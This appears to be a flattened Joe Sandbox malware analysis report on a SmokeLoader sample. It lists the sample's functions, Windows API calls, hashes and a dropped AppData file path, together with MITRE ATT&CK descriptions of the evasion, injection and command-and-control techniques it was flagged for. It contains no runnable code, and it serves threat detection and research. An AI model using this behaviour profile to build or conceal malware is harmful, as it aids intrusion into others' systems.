
Source File: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, Offset: 01121000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1121000_explorer.jbxd

Yara matches

Similarity

API ID: Create$FileInformationMappingMutexVolume
String ID:
API String ID: 3260430491-0
Opcode ID: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
Instruction ID: 3a35d93f0af88f1c9966e12c53d404f3fe6dfd3d035c1b20d2e6a0c21a55f99b
Opcode Fuzzy Hash: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
Instruction Fuzzy Hash: 2141A630718F1D8FEB68EB3880587AE76D2EFA8716F50492DC05FD6240CF7496169786

Function 01124B68 Relevance: 3.1, APIs: 2, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.KERNELBASE ref: 01124BBC
GetTokenInformation.KERNELBASE ref: 01124BF3

Memory Dump Source

Source File: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, Offset: 01121000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1121000_explorer.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 02c84281bba87b7899f42c3c535edb1c0a1e289461f07f6c867dc8d7767b6b06
Instruction ID: 6da89904b503bebeaa42c9931c1fe9b5d5890405da667744b653e51593039823
Opcode Fuzzy Hash: 02c84281bba87b7899f42c3c535edb1c0a1e289461f07f6c867dc8d7767b6b06
Instruction Fuzzy Hash: C1213130608A198FC754EF28D49866AB7E2FFD9315B004A6EE59AC7264DB30E8459B81

Function 01123DF8 Relevance: 3.0, APIs: 2, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumWindows.USER32 ref: 01123E14
SleepEx.KERNEL32 ref: 01123E1F

Memory Dump Source

Source File: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, Offset: 01121000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1121000_explorer.jbxd

Yara matches

Similarity

API ID: EnumSleepWindows
String ID:
API String ID: 498413330-0
Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
Instruction ID: e34513531bc6722e9aeac1a7e3e9480ee9b6e549aa989ba9e42d3f883ba13328
Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
Instruction Fuzzy Hash: D9E04F305146198FFB6CAFA5C0DCBB036A1FB18206F14017ADC1EDD286CB7A4959C720

Function 01123414 Relevance: 1.7, APIs: 1, Instructions: 157
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 0112345A

Memory Dump Source

Source File: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, Offset: 01121000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1121000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
Instruction ID: 3033bcda1a95237475414cd84cd25f04dfda752de4a11812a01ec3e6da6c6744
Opcode Fuzzy Hash: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
Instruction Fuzzy Hash: AF41D63071CF1D4FD79CAA2C98993B9B6C2FB98615F10022ED5AFC3241DF28981243C2

Function 01124DB8 Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationA.KERNEL32 ref: 01124E25

Memory Dump Source

Source File: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, Offset: 01121000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1121000_explorer.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: b1dc968a53a67113d9f19c608549fb198ed32c9322c33b77876c40581a868fca
Instruction ID: d909d82e2cb133bf53e6d8728de6194812a39a1b91a051389e92d3c97f5caa84
Opcode Fuzzy Hash: b1dc968a53a67113d9f19c608549fb198ed32c9322c33b77876c40581a868fca
Instruction Fuzzy Hash: C1315A30618A4C8FD7A4EF28C4486EA77E1FBE8315F10466ED84EC7264DF34D9458781

Function 01121AA8 Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01121AF8: RtlCreateHeap.NTDLL ref: 01121C0F

SleepEx.KERNEL32(?,?,?,?,?,?,?,01121A9B), ref: 01121AC8

Memory Dump Source

Source File: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, Offset: 01121000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1121000_explorer.jbxd

Yara matches

Similarity

API ID: CreateHeapSleep
String ID:
API String ID: 221814145-0
Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
Instruction ID: a7204cdd326bb3131d7e178815fba19e9ae264339b38d5feb0900770c5ab4ed9
Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
Instruction Fuzzy Hash: C2E0DF10304F592BEB9DFBB8C4C472D20D0EB98250F50057DE90EC6285DA35C8A04322

Non-executed Functions

Function 01122968 Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, Offset: 01121000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1121000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fac0ba0fd63c2bd3756d508b4e923d710e7c255c2520c70d3ed946f0b978393
Instruction ID: 47b52ccc9f5ed65d03d944af78f0cb9a6ab55e6f1751c0fc5d0380fc65c16aec
Opcode Fuzzy Hash: 0fac0ba0fd63c2bd3756d508b4e923d710e7c255c2520c70d3ed946f0b978393
Instruction Fuzzy Hash: AFD18F30718F198FDB6CEF6C84982AEB6E2EBA8305F50052ED44EC3255DF74E9168785

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report br0A8E2X6I.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\rdihhcd

C:\Users\user\AppData\Roaming\rdihhcd:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
br0A8E2X6I.exe

Function 00401553 Relevance: 10.7, APIs: 7, Instructions: 208
nativeCOMMON

Function 0040156B Relevance: 10.7, APIs: 7, Instructions: 176
nativeCOMMON

Function 00401561 Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Function 0040156F Relevance: 10.7, APIs: 7, Instructions: 172
nativeCOMMON

Function 00401583 Relevance: 10.7, APIs: 7, Instructions: 171
nativeCOMMON

Function 00401587 Relevance: 10.7, APIs: 7, Instructions: 166
nativeCOMMON

Function 00401729 Relevance: 4.7, APIs: 3, Instructions: 179
nativeCOMMON

Function 00403005 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Function 005F4C48 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 004F003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Function 004F0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 0040193E Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Function 0040194A Relevance: 1.3, APIs: 1, Instructions: 57
sleepCOMMON

Function 0040195C Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Function 00401973 Relevance: 1.3, APIs: 1, Instructions: 51
sleepCOMMON

Function 011235B8 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON